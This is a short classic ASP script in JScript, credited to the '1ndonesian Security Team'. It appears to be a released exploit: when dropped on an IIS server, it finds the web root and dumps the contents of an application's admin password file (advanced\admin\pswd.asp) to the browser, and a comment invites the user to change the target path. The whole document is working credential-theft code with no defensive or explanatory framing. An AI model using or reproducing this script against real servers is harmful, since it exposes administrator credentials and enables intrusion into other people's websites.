// 1ndonesian Security Team // http://bosen.net/releases/ // <% @ Language = JScript %> <% function WinPath(absPath) {this.absolutePath = absPath;} function getAbsPath() {return this.absolutePath;} WinPath.prototype.getAbsolutePath = getAbsPath; function fileRead(file) { var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = "" var tmp = file, f, g = FSO.GetFile(tmp); f = FSO.OpenTextFile(tmp, 1, false); strOut = "
";
  strOut+= Server.HTMLEncode(f.ReadAll());
  strOut+= "
"; f.Close(); return(strOut); } var a = new WinPath(Server.Mappath("/")); var curDir = a.getAbsolutePath(); // You can change these var admin = curDir + "\\advanced\\admin\\pswd.asp"; with (Response) { Write("ServerRoot : "+curDir+"
"); Write("Admin Info : "+admin+"

"); Write(fileRead(admin)); } %>